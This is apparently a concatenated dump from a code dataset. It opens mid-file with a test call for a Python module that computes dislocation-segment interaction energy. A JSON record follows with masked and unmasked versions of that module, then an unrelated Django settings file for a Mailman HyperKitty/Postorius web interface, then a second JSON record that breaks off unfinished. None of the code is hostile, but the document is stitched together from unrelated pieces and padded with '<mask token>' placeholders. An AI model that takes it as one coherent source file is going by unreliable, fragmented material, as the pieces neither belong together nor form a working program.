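    r1, r2 = array([0.0, 0.0, 0.0]), array([10.0, 0.0, 0.0])   # segment 1
    r3, r4 = array([0.0, 0.0, 2.0]), array([10.0, 3.0, 2.0])   # segment 2 (non-parallel)
    print(enginteract(MU, NU, b, b, r1, r2, r3, r4, a))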
|
normal
|
{
"blob_id": "2611d7dd364f6a027da29c005754ac2465faa8be",
"index": 8667,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef engparallelb2(MU, NU, b1, b2, x1, x2, y1, y2, eta, a):\n b1x = b1[0]\n b1y = b1[1]\n b1z = b1[2]\n b2x = b2[0]\n b2y = b2[1]\n b2z = b2[2]\n Rab = Rp(x2, y2, eta, a) - Rp(x2, y1, eta, a) - Rp(x1, y2, eta, a) + Rp(x1,\n y1, eta, a)\n ap = sqrt(eta ** 2 + a ** 2)\n Iab = Ia(x2, y2, 1, ap) - Ia(x2, y1, 1, ap) - Ia(x1, y2, 1, ap) + Ia(x1,\n y1, 1, ap)\n Jab = Ja(x2, y2, 1, ap) - Ja(x2, y1, 1, ap) - Ja(x1, y2, 1, ap) + Ja(x1,\n y1, 1, ap)\n return MU / 4 / pi * (b1x * b2x + (b1z * b2z + b1y * b2y) / (1 - NU)\n ) * Iab + MU / 4 / pi * (b1x * b2x) * (a ** 2 / 2\n ) * Jab - MU / 4 / pi / (1 - NU) * b1z * b2z * eta * eta * Jab\n\n\n<mask token>\n\n\ndef enginteract(MU, NU, b1, b2, r1, r2, r3, r4, a):\n r21 = r2 - r1\n r43 = r4 - r3\n r31 = r3 - r1\n e1 = r21 / norm(r21)\n e2 = r43 / norm(r43)\n e3 = cross(e1, e2)\n subzero = 1e-10\n if norm(e3) < subzero:\n e2a = schmidt(r31, e1)\n e3 = cross(e1, e2a)\n e3 = e3 / norm(e3)\n eta = (dot(r3 - r1, e2a) + dot(r4 - r1, e2a)) / 2\n x1 = 0\n x2 = dot(r2 - r1, e1)\n y1 = dot(r3 - r1, e1)\n y2 = dot(r4 - r1, e1)\n b1n = zeros([3, 1])\n b2n = zeros([3, 1])\n b1n[0], b2n[0] = dot(b1, e1), dot(b2, e1)\n b1n[1], b2n[1] = dot(b1, e2a), dot(b2, e2a)\n b1n[2], b2n[2] = dot(b1, e3), dot(b2, e3)\n return engparallelb2(MU, NU, b1n, b2n, x1, x2, y1, y2, eta, a)\n else:\n costheta = dot(e1, e2)\n e3 = e3 / norm(e3)\n e2a = cross(e3, e1)\n z = dot(r31, e3)\n z = -z\n A = zeros([2, 2])\n A[0, 0], A[0, 1] = dot(r21, e1), -dot(r43, e1)\n A[1, 0], A[1, 1] = dot(r21, e2a), -dot(r43, e2a)\n rhs = zeros([2, 1])\n rhs[0], rhs[1] = dot(r31, e1), dot(r31, e2a)\n t = linalg.solve(A, rhs)\n r0 = (1 - t[0]) * r1 + t[0] * r2\n x1 = dot(r1 - r0, e1)\n x2 = dot(r2 - r0, e1)\n y1 = dot(r3 - r0, e2)\n y2 = dot(r4 - r0, e2)\n return engnonplanarb2(MU, NU, b1, b2, e1, e2, e3, costheta, x1, x2,\n y1, y2, z, a)\n",
"step-3": "<mask token>\n\n\ndef engparallelb2(MU, NU, b1, b2, x1, x2, y1, y2, eta, a):\n b1x = b1[0]\n b1y = b1[1]\n b1z = b1[2]\n b2x = b2[0]\n b2y = b2[1]\n b2z = b2[2]\n Rab = Rp(x2, y2, eta, a) - Rp(x2, y1, eta, a) - Rp(x1, y2, eta, a) + Rp(x1,\n y1, eta, a)\n ap = sqrt(eta ** 2 + a ** 2)\n Iab = Ia(x2, y2, 1, ap) - Ia(x2, y1, 1, ap) - Ia(x1, y2, 1, ap) + Ia(x1,\n y1, 1, ap)\n Jab = Ja(x2, y2, 1, ap) - Ja(x2, y1, 1, ap) - Ja(x1, y2, 1, ap) + Ja(x1,\n y1, 1, ap)\n return MU / 4 / pi * (b1x * b2x + (b1z * b2z + b1y * b2y) / (1 - NU)\n ) * Iab + MU / 4 / pi * (b1x * b2x) * (a ** 2 / 2\n ) * Jab - MU / 4 / pi / (1 - NU) * b1z * b2z * eta * eta * Jab\n\n\ndef engnonplanarb2(MU, NU, b1, b2, xi1, xi2, e3, costheta, x1, x2, y1, y2, z, a\n ):\n ap = sqrt(z * z + a * a)\n Iab = Ia(x2, y2, costheta, ap) - Ia(x2, y1, costheta, ap) - Ia(x1, y2,\n costheta, ap) + Ia(x1, y1, costheta, ap)\n Jab = Ja(x2, y2, costheta, ap) - Ja(x2, y1, costheta, ap) - Ja(x1, y2,\n costheta, ap) + Ja(x1, y1, costheta, ap)\n Tab = Tfa(b1, b2, xi1, xi2, e3, costheta, x2, y2, z, a) - Tfa(b1, b2,\n xi1, xi2, e3, costheta, x2, y1, z, a) - Tfa(b1, b2, xi1, xi2, e3,\n costheta, x1, y2, z, a) + Tfa(b1, b2, xi1, xi2, e3, costheta, x1,\n y1, z, a)\n return MU / 4 / pi * (-2 * dot(cross(b1, b2), cross(xi1, xi2)) + dot(b1,\n xi1) * dot(b2, xi2)) * (Iab + a ** 2 / 2 * Jab) + MU / 4 / pi / (1 - NU\n ) * Tab\n\n\ndef enginteract(MU, NU, b1, b2, r1, r2, r3, r4, a):\n r21 = r2 - r1\n r43 = r4 - r3\n r31 = r3 - r1\n e1 = r21 / norm(r21)\n e2 = r43 / norm(r43)\n e3 = cross(e1, e2)\n subzero = 1e-10\n if norm(e3) < subzero:\n e2a = schmidt(r31, e1)\n e3 = cross(e1, e2a)\n e3 = e3 / norm(e3)\n eta = (dot(r3 - r1, e2a) + dot(r4 - r1, e2a)) / 2\n x1 = 0\n x2 = dot(r2 - r1, e1)\n y1 = dot(r3 - r1, e1)\n y2 = dot(r4 - r1, e1)\n b1n = zeros([3, 1])\n b2n = zeros([3, 1])\n b1n[0], b2n[0] = dot(b1, e1), dot(b2, e1)\n b1n[1], b2n[1] = dot(b1, e2a), dot(b2, e2a)\n b1n[2], b2n[2] = dot(b1, e3), dot(b2, e3)\n return engparallelb2(MU, NU, b1n, b2n, x1, x2, y1, y2, eta, a)\n else:\n costheta = dot(e1, e2)\n e3 = e3 / norm(e3)\n e2a = cross(e3, e1)\n z = dot(r31, e3)\n z = -z\n A = zeros([2, 2])\n A[0, 0], A[0, 1] = dot(r21, e1), -dot(r43, e1)\n A[1, 0], A[1, 1] = dot(r21, e2a), -dot(r43, e2a)\n rhs = zeros([2, 1])\n rhs[0], rhs[1] = dot(r31, e1), dot(r31, e2a)\n t = linalg.solve(A, rhs)\n r0 = (1 - t[0]) * r1 + t[0] * r2\n x1 = dot(r1 - r0, e1)\n x2 = dot(r2 - r0, e1)\n y1 = dot(r3 - r0, e2)\n y2 = dot(r4 - r0, e2)\n return engnonplanarb2(MU, NU, b1, b2, e1, e2, e3, costheta, x1, x2,\n y1, y2, z, a)\n",
"step-4": "from numpy import pi, sqrt, cross, dot, zeros, linalg\nfrom defs import *\n\n\ndef engparallelb2(MU, NU, b1, b2, x1, x2, y1, y2, eta, a):\n b1x = b1[0]\n b1y = b1[1]\n b1z = b1[2]\n b2x = b2[0]\n b2y = b2[1]\n b2z = b2[2]\n Rab = Rp(x2, y2, eta, a) - Rp(x2, y1, eta, a) - Rp(x1, y2, eta, a) + Rp(x1,\n y1, eta, a)\n ap = sqrt(eta ** 2 + a ** 2)\n Iab = Ia(x2, y2, 1, ap) - Ia(x2, y1, 1, ap) - Ia(x1, y2, 1, ap) + Ia(x1,\n y1, 1, ap)\n Jab = Ja(x2, y2, 1, ap) - Ja(x2, y1, 1, ap) - Ja(x1, y2, 1, ap) + Ja(x1,\n y1, 1, ap)\n return MU / 4 / pi * (b1x * b2x + (b1z * b2z + b1y * b2y) / (1 - NU)\n ) * Iab + MU / 4 / pi * (b1x * b2x) * (a ** 2 / 2\n ) * Jab - MU / 4 / pi / (1 - NU) * b1z * b2z * eta * eta * Jab\n\n\ndef engnonplanarb2(MU, NU, b1, b2, xi1, xi2, e3, costheta, x1, x2, y1, y2, z, a\n ):\n ap = sqrt(z * z + a * a)\n Iab = Ia(x2, y2, costheta, ap) - Ia(x2, y1, costheta, ap) - Ia(x1, y2,\n costheta, ap) + Ia(x1, y1, costheta, ap)\n Jab = Ja(x2, y2, costheta, ap) - Ja(x2, y1, costheta, ap) - Ja(x1, y2,\n costheta, ap) + Ja(x1, y1, costheta, ap)\n Tab = Tfa(b1, b2, xi1, xi2, e3, costheta, x2, y2, z, a) - Tfa(b1, b2,\n xi1, xi2, e3, costheta, x2, y1, z, a) - Tfa(b1, b2, xi1, xi2, e3,\n costheta, x1, y2, z, a) + Tfa(b1, b2, xi1, xi2, e3, costheta, x1,\n y1, z, a)\n return MU / 4 / pi * (-2 * dot(cross(b1, b2), cross(xi1, xi2)) + dot(b1,\n xi1) * dot(b2, xi2)) * (Iab + a ** 2 / 2 * Jab) + MU / 4 / pi / (1 - NU\n ) * Tab\n\n\ndef enginteract(MU, NU, b1, b2, r1, r2, r3, r4, a):\n r21 = r2 - r1\n r43 = r4 - r3\n r31 = r3 - r1\n e1 = r21 / norm(r21)\n e2 = r43 / norm(r43)\n e3 = cross(e1, e2)\n subzero = 1e-10\n if norm(e3) < subzero:\n e2a = schmidt(r31, e1)\n e3 = cross(e1, e2a)\n e3 = e3 / norm(e3)\n eta = (dot(r3 - r1, e2a) + dot(r4 - r1, e2a)) / 2\n x1 = 0\n x2 = dot(r2 - r1, e1)\n y1 = dot(r3 - r1, e1)\n y2 = dot(r4 - r1, e1)\n b1n = zeros([3, 1])\n b2n = zeros([3, 1])\n b1n[0], b2n[0] = dot(b1, e1), dot(b2, e1)\n b1n[1], b2n[1] = dot(b1, e2a), dot(b2, e2a)\n b1n[2], b2n[2] = dot(b1, e3), dot(b2, e3)\n return engparallelb2(MU, NU, b1n, b2n, x1, x2, y1, y2, eta, a)\n else:\n costheta = dot(e1, e2)\n e3 = e3 / norm(e3)\n e2a = cross(e3, e1)\n z = dot(r31, e3)\n z = -z\n A = zeros([2, 2])\n A[0, 0], A[0, 1] = dot(r21, e1), -dot(r43, e1)\n A[1, 0], A[1, 1] = dot(r21, e2a), -dot(r43, e2a)\n rhs = zeros([2, 1])\n rhs[0], rhs[1] = dot(r31, e1), dot(r31, e2a)\n t = linalg.solve(A, rhs)\n r0 = (1 - t[0]) * r1 + t[0] * r2\n x1 = dot(r1 - r0, e1)\n x2 = dot(r2 - r0, e1)\n y1 = dot(r3 - r0, e2)\n y2 = dot(r4 - r0, e2)\n return engnonplanarb2(MU, NU, b1, b2, e1, e2, e3, costheta, x1, x2,\n y1, y2, z, a)\n",
"step-5": "from numpy import pi,sqrt,cross,dot,zeros,linalg\n\nfrom defs import *\n##from numba import njit, prange\n##\n##@njit(parallel=True)\n\n\ndef engparallelb2(MU,NU,b1,b2,x1,x2,y1,y2,eta,a):\n\n#For use in enginteract below\n#HL p.154 Eq.(6-45)\n\n b1x=b1[0]\n b1y=b1[1]\n b1z=b1[2]\n\n b2x=b2[0]\n b2y=b2[1]\n b2z=b2[2]\n\n Rab=Rp(x2,y2,eta,a)-Rp(x2,y1,eta,a)-Rp(x1,y2,eta,a)+Rp(x1,y1,eta,a)\n\n #[b1',b2',x1,x2,y1,y2,eta,a,Rab]\n #b1\n\n ap=sqrt(eta**2+a**2)\n Iab=Ia(x2,y2,1,ap)-Ia(x2,y1,1,ap)-Ia(x1,y2,1,ap)+Ia(x1,y1,1,ap)\n Jab=Ja(x2,y2,1,ap)-Ja(x2,y1,1,ap)-Ja(x1,y2,1,ap)+Ja(x1,y1,1,ap)\n\n\n\n return MU/4/pi*(b1x*b2x+(b1z*b2z+b1y*b2y)/(1-NU))*Iab \\\n + MU/4/pi*(b1x*b2x)*(a**2/2)*Jab \\\n - MU/4/pi/(1-NU)*b1z*b2z*eta*eta*Jab\n\n\n\ndef engnonplanarb2(MU,NU,b1,b2,xi1,xi2,e3,costheta,x1,x2,y1,y2,z,a):\n\n#For use in enginteract below\n\n#\n# ^ y axis\n# /\n# -\n# y /\n# / theta\n# ---------------|----------------> x axis\n# x\n#\n# x>0, y>0 HL p152, Eq.(6-33)\n\n ap=sqrt(z*z+a*a)\n\n Iab = Ia(x2,y2,costheta,ap)-Ia(x2,y1,costheta,ap)-Ia(x1,y2,costheta,ap)+Ia(x1,y1,costheta,ap)\n Jab = Ja(x2,y2,costheta,ap)-Ja(x2,y1,costheta,ap)-Ja(x1,y2,costheta,ap)+Ja(x1,y1,costheta,ap)\n\n Tab = ( Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y2,z,a)\n - Tfa(b1,b2,xi1,xi2,e3,costheta,x2,y1,z,a)\n - Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y2,z,a)\n + Tfa(b1,b2,xi1,xi2,e3,costheta,x1,y1,z,a) )\n\n return ( MU/4/pi*(-2*dot(cross(b1,b2),cross(xi1,xi2))\n + dot(b1,xi1)*dot(b2,xi2) )*(Iab+a**2/2*Jab)\n + MU/4/pi/(1-NU)*Tab )\n\n#When Iab incorporates Jab\n#W = ( MU/4/pi* (-2*dot(cross(b1,b2),cross(xi1,xi2)) + dot(b1,xi1)*dot(b2,xi2) )*(Iab)\n# + MU/4/pi/(1-NU)* Tab )\n\n\n\ndef enginteract(MU,NU,b1,b2,r1,r2,r3,r4,a):\n\n\n#Computes interaction energy between two straight dislocation segments\n#r1-r2 (Burgers vector b1) and r3-r4 (Burgers vector b2)\n#MU is shear modulus, NU is Poisson ratio, a is core spread radius\n\n\n r21=r2-r1\n r43=r4-r3\n r31=r3-r1\n\n\n#Make sure that the segments are represented by column vectors\n\n #if r21.shape[0]==1:\n #r21=r21.T\n #if r43.shape[0]==1:\n #r43=r43.T\n #if r31.shape[0]==1:\n #r31=r31.T\n\n\n#Segment line sense unit vectors \n\n e1=r21/norm(r21)\n e2=r43/norm(r43)\n\n\n#Catagorise line segments according to whether they are parallel or not\n\n e3=cross(e1,e2)\n subzero=1e-10\n\n if norm(e3)<subzero:\n e2a=schmidt(r31,e1)\n e3=cross(e1,e2a)\n e3=e3/norm(e3)\n eta=(dot(r3-r1,e2a)+dot(r4-r1,e2a))/2\n x1=0\n x2=dot(r2-r1,e1)\n y1=dot(r3-r1,e1)\n y2=dot(r4-r1,e1)\n#engparallelb2 doesn't rotate b, it needs to be done here\n b1n=zeros([3,1])\n b2n=zeros([3,1])\n b1n[0],b2n[0]=dot(b1,e1),dot(b2,e1)\n b1n[1],b2n[1]=dot(b1,e2a),dot(b2,e2a)\n b1n[2],b2n[2]=dot(b1,e3),dot(b2,e3)\n return engparallelb2(MU,NU,b1n,b2n,x1,x2,y1,y2,eta,a)\n else:\n costheta=dot(e1,e2)\n e3=e3/norm(e3)\n e2a=cross(e3,e1)\n z=dot(r31,e3) \n z=-z\n A=zeros([2,2])\n A[0,0],A[0,1]=dot(r21,e1),-dot(r43,e1)\n A[1,0],A[1,1]=dot(r21,e2a),-dot(r43,e2a)\n rhs=zeros([2,1])\n rhs[0],rhs[1]=dot(r31,e1),dot(r31,e2a)\n t=linalg.solve(A,rhs)\n r0=(1-t[0])*r1+t[0]*r2\n x1=dot(r1-r0,e1)\n x2=dot(r2-r0,e1)\n y1=dot(r3-r0,e2)\n y2=dot(r4-r0,e2)\n return engnonplanarb2(MU,NU,b1,b2,e1,e2,e3,costheta,x1,x2,y1,y2,z,a)\n \n \n \n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#-*- coding: utf-8 -*-
"""
Django settings for HyperKitty + Postorius
Pay attention to settings ALLOWED_HOSTS and DATABASES!
"""
from os.path import abspath, dirname, join as joinpath
from ConfigParser import SafeConfigParser
def read_cfg(path, section=None, option=None):
config = SafeConfigParser()
config.read(path)
def get(section, option):
return config.get(section, option) if config.has_option(section, option) else None
return get(section, option) if section else get
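# Called with all three arguments, read_cfg returns a single option value (or
# None if it is missing); called with only a path, it returns a getter that can
# be invoked later as get(section, option), as done for mailman_cfg below.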
mailman_cfg = read_cfg('/etc/mailman.cfg')
BASE_DIR = '/usr/lib/bundles/mailman-webui'
CONF_DIR = '/etc/mailman-webui'
DATA_DIR = '/var/lib/mailman-webui'
LOG_DIR = '/var/log/mailman-webui'
# Hosts/domain names that are valid for this site.
# NOTE: You MUST add domain name of your instance of this application here!
# See https://docs.djangoproject.com/en/1.9/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['localhost']
# Mailman API credentials
# NOTE: Replace with hard-coded values if Mailman is running on a different host.
MAILMAN_REST_API_URL = 'http://localhost:%s' % (mailman_cfg('webservice', 'port') or 8001)
MAILMAN_REST_API_USER = mailman_cfg('webservice', 'admin_user') or 'restadmin'
MAILMAN_REST_API_PASS = mailman_cfg('webservice', 'admin_pass')
MAILMAN_ARCHIVER_KEY = read_cfg('/etc/mailman.d/hyperkitty.cfg', 'general', 'api_key')
MAILMAN_ARCHIVER_FROM = ('127.0.0.1', '::1', '::ffff:127.0.0.1')
# REST API
REST_FRAMEWORK = {
'PAGE_SIZE': 10,
}
# Only display mailing-lists in HyperKitty from the same virtual host
# as the webserver.
FILTER_VHOST = False
#
# Application definition
#
SITE_ID = 1
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'hyperkitty',
'rest_framework',
'django_gravatar',
'paintstore',
'compressor',
'haystack',
'django_extensions',
'postorius',
'django_mailman3',
'stronghold',
# Uncomment the next line to enable integration with Sentry
# and set DSN in RAVEN_CONFIG.
#'raven.contrib.django.raven_compat',
'allauth',
'allauth.account',
'allauth.socialaccount',
# Uncomment providers that you want to use, if any.
#'allauth.socialaccount.providers.openid',
#'allauth.socialaccount.providers.github',
#'allauth.socialaccount.providers.gitlab',
#'allauth.socialaccount.providers.google',
#'allauth.socialaccount.providers.twitter',
#'allauth.socialaccount.providers.stackexchange',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django_mailman3.middleware.TimezoneMiddleware',
'postorius.middleware.PostoriusMiddleware',
# Uncomment to require a user to be authenticated to view any page.
#'stronghold.middleware.LoginRequiredMiddleware',
)
# A string representing the full Python import path to your root URLconf.
ROOT_URLCONF = 'urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
# Directory for templates override.
joinpath(DATA_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.template.context_processors.csrf',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django_mailman3.context_processors.common',
'hyperkitty.context_processors.common',
'postorius.context_processors.postorius',
],
},
},
]
WSGI_APPLICATION = 'wsgi.application'
# Using the cache infrastructure can significantly improve performance on a
# production setup. This is an example with a local Memcached server.
#CACHES = {
# 'default': {
# 'BACKEND': 'django.core.cache.backends.memcached.PyLibMCCache',
# 'LOCATION': '127.0.0.1:11211',
# }
#}
#
# Databases
# See https://docs.djangoproject.com/en/1.9/ref/settings/#databases
#
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': joinpath(DATA_DIR, 'db.sqlite3'),
}
# Remove the above lines and uncomment the below to use PostgreSQL.
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': 'mailman_webui',
# 'USER': 'mailman_webui',
# 'PASSWORD': 'change-me',
# # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
# 'HOST': '127.0.0.1',
# 'PORT': '',
# }
}
# Full-text search engine
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': joinpath(DATA_DIR, 'fulltext_index'),
},
}
#
# Outgoing mails
#
# NOTE: Replace with hard-coded values if Mailman is running on a different host.
# The host and port of the SMTP server to use for sending email.
EMAIL_HOST = mailman_cfg('mta', 'smtp_host') or 'localhost'
EMAIL_PORT = int(mailman_cfg('mta', 'smtp_port') or 25)
# Username and password to use for the SMTP server defined above.
EMAIL_HOST_USER = mailman_cfg('mta', 'smtp_user') or ''
EMAIL_HOST_PASSWORD = mailman_cfg('mta', 'smtp_pass') or ''
# Whether to use a explicit TLS connection when talking to the SMTP server.
EMAIL_USE_TLS = False
# Whether to use an implicit TLS connection when talking to the SMTP server.
EMAIL_USE_SSL = False
# A tuple that lists people who get code error notifications. When DEBUG=False
# and a view raises an exception, Django will email these people with the full
# exception information. Each member of the tuple should be a tuple of (Full
# name, email address).
ADMINS = (
('Mailman Admin', 'root@localhost'),
)
# If you enable email reporting for error messages, this is where those emails
# will appear to be coming from. Make sure you set a valid domain name,
# otherwise the emails may get rejected.
# https://docs.djangoproject.com/en/1.9/ref/settings/#std:setting-SERVER_EMAIL
#SERVER_EMAIL = '[email protected]'
# If you enable internal authentication, this is the address that the emails
# will appear to be coming from. Make sure you set a valid domain name,
# otherwise the emails may get rejected.
# https://docs.djangoproject.com/en/1.9/ref/settings/#default-from-email
#DEFAULT_FROM_EMAIL = '[email protected]'
#
# Security settings
#
# A secret key used for signing sessions, cookies, password reset tokens etc.
SECRET_KEY = open(joinpath(CONF_DIR, 'secret_key')).read()
CSRF_COOKIE_SECURE = True
CSRF_COOKIE_HTTPONLY = True
SESSION_COOKIE_SECURE = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
X_FRAME_OPTIONS = 'DENY'
# If you're behind a proxy, use the X-Forwarded-Host header
# See https://docs.djangoproject.com/en/1.9/ref/settings/#use-x-forwarded-host
USE_X_FORWARDED_HOST = True
# And if your proxy does your SSL encoding for you, set SECURE_PROXY_SSL_HEADER
# https://docs.djangoproject.com/en/1.9/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
#SECURE_SSL_REDIRECT = True
# If you set SECURE_SSL_REDIRECT to True, make sure the SECURE_REDIRECT_EXEMPT
# contains at least this line:
#SECURE_REDIRECT_EXEMPT = [
# 'archives/api/mailman/.*', # Request from Mailman.
#]
#
# Authentication
#
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
    # Uncomment the next line to enable LDAP authentication.
#'custom.LDAPBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
LOGIN_URL = 'account_login'
LOGIN_REDIRECT_URL = 'hk_root'
LOGOUT_URL = 'account_logout'
# Whether registration of new accounts is currently permitted.
REGISTRATION_OPEN = True
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{ 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator' },
{ 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator' },
{ 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator' },
{ 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator' },
]
# URLs which are ignored by LoginRequiredMiddleware, i.e. the middleware
# does not *force* them to require authentication.
STRONGHOLD_PUBLIC_URLS = (
r'^/accounts/.*',
r'^/archives/api/mailman/.*',
)
## Django Allauth
# Custom AccountAdapter for allauth that respects REGISTRATION_OPEN variable.
ACCOUNT_ADAPTER = 'custom.CloseableRegistrationAccountAdapter'
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'
ACCOUNT_UNIQUE_EMAIL = True
# Whether to disable intermediate logout page.
ACCOUNT_LOGOUT_ON_GET = False
SOCIALACCOUNT_PROVIDERS = {}
#SOCIALACCOUNT_PROVIDERS = {
# 'openid': {
# 'SERVERS': [
# {
# 'id': 'yahoo',
# 'name': 'Yahoo',
# 'openid_url': 'http://me.yahoo.com'
# }
# ],
# },
# 'google': {
# 'SCOPE': ['profile', 'email'],
# 'AUTH_PARAMS': {'access_type': 'online'},
# },
# 'facebook': {
# 'METHOD': 'oauth2',
# 'SCOPE': ['email'],
# 'FIELDS': [
# 'email',
# 'name',
# 'first_name',
# 'last_name',
# 'locale',
# 'timezone',
# ],
# 'VERSION': 'v2.4',
# },
#}
## Django LDAP
if 'custom.LDAPBackend' in AUTHENTICATION_BACKENDS:
import ldap
from django_auth_ldap.config import LDAPSearch
ldap.set_option(ldap.OPT_X_TLS_CACERTDIR, '/etc/ssl/certs')
AUTH_LDAP_SERVER_URI = 'ldaps://ldap.example.org'
AUTH_LDAP_USER_SEARCH = LDAPSearch(
'ou=People,dc=example,dc=org',
ldap.SCOPE_SUBTREE,
'(&(mail=*)(uid=%(user)s))'
)
AUTH_LDAP_USER_ATTR_MAP = {
'first_name': 'givenName',
'last_name': 'sn',
'email': 'mail',
}
#
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
#
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
#
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = joinpath(BASE_DIR, 'static')
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static".
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# django-compressor
COMPRESS_OFFLINE = True
# Compatibility with Bootstrap 3
from django.contrib.messages import constants as messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
#
# Gravatar
# https://github.com/twaddington/django-gravatar
#
# Gravatar base url.
GRAVATAR_URL = 'http://cdn.libravatar.org/'
# Gravatar base secure https url.
GRAVATAR_SECURE_URL = 'https://seccdn.libravatar.org/'
# Gravatar size in pixels.
#GRAVATAR_DEFAULT_SIZE = '80'
# An image url or one of the following: 'mm', 'identicon', 'monsterid', 'wavatar', 'retro'.
GRAVATAR_DEFAULT_IMAGE = 'retro'
# One of the following: 'g', 'pg', 'r', 'x'.
#GRAVATAR_DEFAULT_RATING = 'g'
# True to use https by default, False for plain http.
GRAVATAR_DEFAULT_SECURE = True
#
# Logging
#
# Logging configuration. Messages of level INFO and above are written to
# LOG_DIR/mailman-webui.log; the 'mail_admins' handler is defined below but is
# not attached to any logger, so no error emails are sent unless you wire it in.
# See http://docs.djangoproject.com/en/dev/topics/logging for more details on
# how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple',
},
'file':{
'level': 'INFO',
#'class': 'logging.handlers.RotatingFileHandler',
'class': 'logging.handlers.WatchedFileHandler',
'filename': joinpath(LOG_DIR, 'mailman-webui.log'),
'formatter': 'verbose',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
},
'loggers': {
#'django.request': {
# 'handlers': ['mail_admins'],
# 'level': 'ERROR',
# 'propagate': True,
#},
'django.request': {
'handlers': ['file'],
'level': 'ERROR',
'propagate': True,
},
'django': {
'handlers': ['file'],
'level': 'ERROR',
'propagate': True,
},
'postorius': {
'handlers': ['file'],
'level': 'INFO',
'propagate': True,
},
'hyperkitty': {
'handlers': ['file'],
'level': 'INFO',
'propagate': True,
},
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'root': {
'handlers': ['file'],
'level': 'INFO',
},
}
if 'raven.contrib.django.raven_compat' in INSTALLED_APPS:
RAVEN_CONFIG = {
'dsn': 'https://<key>:<secret>@sentry.io/<project>',
}
LOGGING['handlers']['sentry'] = {
'level': 'ERROR',
'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
}
    LOGGING['root']['handlers'].append('sentry')  # 'root' is a top-level key, not under 'loggers'
try:
from settings_local import *
except ImportError:
pass
|
normal
|
{
"blob_id": "0dd17d8872b251fbc59a322bf3c695bd8079aba4",
"index": 3338,
"step-1": "<mask token>\n\n\ndef read_cfg(path, section=None, option=None):\n config = SafeConfigParser()\n config.read(path)\n\n def get(section, option):\n return config.get(section, option) if config.has_option(section, option\n ) else None\n return get(section, option) if section else get\n\n\n<mask token>\n",
